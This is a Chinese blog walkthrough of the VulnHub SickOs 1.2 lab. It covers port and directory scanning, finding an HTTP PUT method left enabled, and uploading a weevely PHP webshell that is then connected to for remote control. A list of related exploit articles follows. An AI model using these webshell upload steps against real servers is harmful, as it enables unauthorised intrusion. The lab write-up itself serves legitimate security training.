PUT漏洞实战

最新推荐文章于 2023-10-27 10:28:34 发布
最新推荐文章于 2023-10-27 10:28:34 发布
阅读量611 收藏 2
点赞数
分类专栏: 靶场实战系列 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_23347209/article/details/125140692
版权

文章目录

环境准备

本次环境使用的是vulnhub靶场里面的sickos:1.2

靶场下载地址:https://www.vulnhub.com/entry/sickos-12,144/
靶机 192.168.146.154
攻击机 parrot 192.168.146.129

提示:以下是本篇文章正文内容,下面案例可供参考

一、服务器信息搜集

nmap -p- -A 192.168.146.154

发现开放了22和80端口
在这里插入图片描述

二、网站信息搜集

1、浏览网站

浏览器打开站点,大概是这样的↓
在这里插入图片描述

2、使用nikto和dirb对网站扫描

dirb是一个基于字典的web目录扫描工具,是信息搜集常用的工具

dirb http://192.168.146.154

发现敏感目录👇
在这里插入图片描述

nikto 是一款用来发现 web 应用程序漏洞的一个工具,常用于对web网页服务器进行全面的多种扫描

nikto -h http://192.168.146.154

并没有发现什么有用的信息
在这里插入图片描述

3、OWASP ZAP进行扫描测试

ZAP是OWASP里的工具类项目,全称是OWASP Zed attack proxy,是一款web application 集成渗透测试和漏洞工具,
ZAP主要覆盖了安全性测试里渗透测试即对系统进行模拟攻击和分析来确定其安全性漏洞。

parrot选择owasp-zap进入
在这里插入图片描述
在这里插入图片描述
开始主动扫描👇
在这里插入图片描述
发现了存在X-Frame-Options Header Not Set漏洞
在这里插入图片描述
这里简单介绍一下这个漏洞

X-Frame-Options HTTP响应头是⽤来确认是否浏览器可以在frame或iframe标签中渲染⼀个页⾯,⽹站可以⽤这个头来保证他们的内容不会被嵌入到其他网站中,以来避免点击劫持。

如果配置不当的话,恶意攻击者可以利⽤漏洞攻击做到:

以使⽤⼀个透明的、不可见的iframe,覆盖在⽬标⽹页上,然后诱使⽤户在该⽹页上进⾏操作,通过调整iframe页⾯的位置,可以诱使⽤户恰好点击iframe页⾯的⼀些功能性按钮上,导致被劫持。

【不过本靶机实验用不到,了解一下😄O(∩_∩)O】

curl -v -X OPTIONS 192.168.146.154/test/

在这里插入图片描述
关键:允许使用PUT

三、漏洞利用

1、使用weevely创建木马

weevely是parrot和kali下集成的一款很好用的针对php语言的webshell管理工具,可用于像一个隐藏的后门。
并且携带了大量渗透测试的管理模块,客户端也可以在本地运行shell命令传输

weevely generate 123456 /root/shell.php

在这里插入图片描述
在这里插入图片描述
然后打开火狐,使用扩展RESTClient,将webshell放进去

在这里插入图片描述
send发送
在这里插入图片描述
成功发送到服务器里↓
在这里插入图片描述

2、weevely连接木马

weevely http://192.168.146.154/test/shell.php 123456

在这里插入图片描述
在这里插入图片描述
成功连接✌,接下来就是提权

出黎on
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Tomcat PUT方法任意写文件漏洞(CVE-2017-12615)
weixin_45653478的博客
05-02 1092
在Apache Tomcat服务器中,PUT方法通常用于上传文件。攻击者可以通过发送PUT请求,将恶意文件上传到服务器。当攻击者发送PUT请求时,Tomcat服务器会将请求中的数据写入指定的文件。如果攻击者能够控制文件路径,那么他们可以将恶意文件写入任意位置,从而实现任意文件写入。
文件上传漏洞
weixin_58954236的博客
09-02 1238
文件上传是Web 应用必备功能之一,如,头像上传,附件分享等。如果服务器配置不当或者没有进行足够的过滤,Web 用户就可以上传任意文件,包括恶意脚本文件,exe 程序等等,这就造成了任意文件上传漏洞
PUT中间件上传漏洞
weixin_45007073的博客
01-13 2460
先介绍一下PUT上传漏洞的原理 我们常见的中间件有apache,tomcat,IIS,weblogic(其实就是web容器),这些中间件可以设置支持的HTTP方法。每一个HTTP方法都有其对应的功能,在这些方法中,PUT可以直接从客户机上传文件到服务器。如果中间件开放了HTTP中的PUT方法,那么恶意攻击者就可以直接上传webshell到对应的服务器上。 靶机搭建 链接:https://pan.baidu.com/s/1l_LILZgjUZ6ASrFQq9X22A 提取码:lsq0 漏洞复现 使用netd
靶机记录(十三):SickOs1.2 - IIS 中 PUT 漏洞的利用
weixin_47306547的博客
11-09 1763
目录 环境 主机发现 端口扫描 漏洞挖掘 GetShell 法一 法二 法三 提权 chkrootkit 漏洞提权 法一 法二 法三 防火墙规则 清痕迹,留后门 环境 链接:https://pan.baidu.com/s/1OI1bYsnS_LBvMIrQCt1yuw 提取码:lish 主机发现 端口扫描 漏洞挖掘 查看网页支持的访问方式: nmap --script=http-methods --...
CTF—攻防练习之HTTP—18PUT上传漏洞
mutou990的博客
07-31 1760
主机:192.168.56.103 靶机:192.168.56.105 中间件PUT漏洞 包括apache,tomcat,IIS等中间件设置支持的HTTP方法(get,post,head,delete,put等) 每一个开放了HTTP方法都有其对应功能,PUT方法可以直接从客户机上传文件到服务器,如果中间件开放了 HTTP中的PUT方法,那么就可以利用上传webshell到服务器对应目录 一、信息探测 扫描靶机端口: 然后常规方法nikto -host ,dirb探测敏感文件,owasp zap扫web
【APP漏洞挖掘实战】某下载量超101万的APP有几个漏洞可以GetShell?
shandongjiushen的博客
01-30 751
一个APP可能存在多个漏洞
你可能不知道的CORS跨域资源共享
10-17
非简单请求则是其他任何不满足简单请求条件的请求,例如使用PUT、DELETE方法,或者自定义了特定的请求头。对于非简单请求,浏览器会先发送一个OPTIONS预检请求,询问服务器是否允许即将发出的实际请求。 在设置CORS...
Linux内核级后门的原理及简单实战
08-10
【Linux内核级后门的原理及简单实战】 在深入探讨Linux内核级后门之前,首先要理解Linux操作系统的架构。Linux是一个基于保护模式的系统,主要运行在i386 CPU上。保护模式将内存划分为两部分:内核区域和用户区域。...
9.3 超文本传输协议 - Wireshark 数据包分析实战(第 3 版) - 知乎书店1
08-03
请求由一个方法(如GET、POST、PUT、DELETE等)和一个URL组成,可能还包含头信息和请求体。响应则包含状态码(如200表示成功,404表示未找到,500表示服务器错误),响应头和响应体。 2. 状态码:HTTP状态码是三位...
陇原战疫2021网络安全大赛 Web1
08-03
最后,描述中提及的payload构造过程,包括使用`urlencode(serialize(new Bypass()))`和`file_put_contents()`函数,揭示了攻击者可能在尝试构造能够触发特定行为的PHP序列化字符串,并将其写入文件系统,以实现恶意...
web-hacking-101
04-25
Web黑客基础教程》是一本面向初学者的实战指南,旨在帮助读者掌握Web安全基础知识,了解黑客攻击原理,并学习如何挖掘和利用Web应用程序中的漏洞。本教程的特点是它不需要读者具备深厚的英语背景,只需借助谷歌...
一个完整挖洞 /src 漏洞实战流程【渗透测试】
最新发布
bdfcfff77fa的博客
10-27 340
只要搞渗透,不就会听到很多行业内人前辈一直在重复:“信息搜集” 信息搜集有多重要,你搜集的到的多少资产信息,决定了你后续进行的一系列实战到什么程度!很多朋友都不喜欢晦涩的文字,我也为大家准备了视频教程,其中一共有21个章节,每个章节都是当前板块的精华浓缩。实这都一个道理,用谷歌语法,找通杀用 fofa,这里演示几个类型的漏洞,其它的也是一个道理。这时候明白接公司的重要性了吧,这里找的是 asp 的站,为啥找 asp 的站?要说 SQL 注入的漏洞咋找,逻辑漏洞咋找,支付漏洞咋找,越权漏洞咋找,等等。
SRC漏洞挖掘经验+技巧篇
Innocence_0的博客
09-15 996
在HP Data protecetor Media Operations 的客户端连接服务端时,通过私访有的通信协议,客户端会首先检查[系统分区]:\Documents and Settings[用户名]\Application Data 下面是否有相应的资源(如插件等),如果没有,则会向服务器请求需要的文件,服务器没有验证请求的文件名的合法性,而且这个过程不需要任何验证,攻击者精心构造文件名,可以读取服务端安装目录所在分区的任意文件。最古老的内存破坏类型。漏洞造成的敏感信息泄露导致机密性的破坏;
IIS put上传漏洞
dqd66的博客
10-17 1432
2.更改后缀(使用copy或者move方法 将上传好的文本文件复制到cmd.asp 中 然后使用中国菜刀连接)会在返回的 Allow 消息头中,包含 PUT,MOVE,COPY 可能存在IIS PUT上传漏洞。导致HTTP支持PUT相关方法,导致IIS上传漏洞 用户可以向指定目录上传任意文件。IIS Put 上传漏洞前提 :1,IIS开启WebDAV。1.上传(使用PUT方法 上传文本文件 1.txt)3,设置站点目录权限,是的IIS用户不具有写入权限。//chopper是密码。IIS put上传漏洞
IIS写权限漏洞 (HTTP PUT方法利用)
dieman0446的博客
12-02 824
漏洞的产生原因来源于服务器配置不当造成,利用IIS PUT Scaner扫描有漏洞的iis,此漏洞主要是因为服务器开启了 webdav的组件导致的可以扫描到当前的操作,具体操作其实是通过webdav的OPTION来查询是否支持PUT。 具体的原理在这个链接里。 http://www.2cto.com/Article/201307/228165.html 这个帖子是以前在法客里...
(CVE-2017-12615)Tomcat PUT方法任意文件上传漏洞
weixin_45253622的博客
03-29 6063
(CVE-2017-12615)Tomcat任意文件上传漏洞 漏洞介绍 在一定条件下,攻击者可以利用漏洞,获取用户服务器上 JSP 文件的源代码,或是通过精心构造的攻击请求,向用户服务器上传恶意JSP文件,通过上传的 JSP 文件 ,可在用户服务器上执行任意代码,从而导致数据泄露或获取服务器权限,存在高安全风险。 漏洞条件: 存在漏洞的Tomcat运行在Windows主机上,并且启用了HTTP PUT请求方法(例如:将readonly初始化参数由默认值设置为false) 影响版本 Apache Tomca
CVE-2020-1472漏洞实战 深度剖析
Ms08067安全实验室
11-18 9190
本文作者:Faith(Ms08067实验室 内网安全攻防知识星球)0x00漏洞说明CVE-2020-1472是继MS17010之后一个比较好用的内网提权漏洞,影响Windows Serv...
file_put_contents()漏洞
08-03
因此,开发人员在使用file_put_contents()函数时,应该对输入数据进行充分的过滤和验证,以防止此类漏洞的发生。 ### 回答2: file_put_contents()是PHP中的一个文件操作函数,用于将数据写入一个文件中。然而,这...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值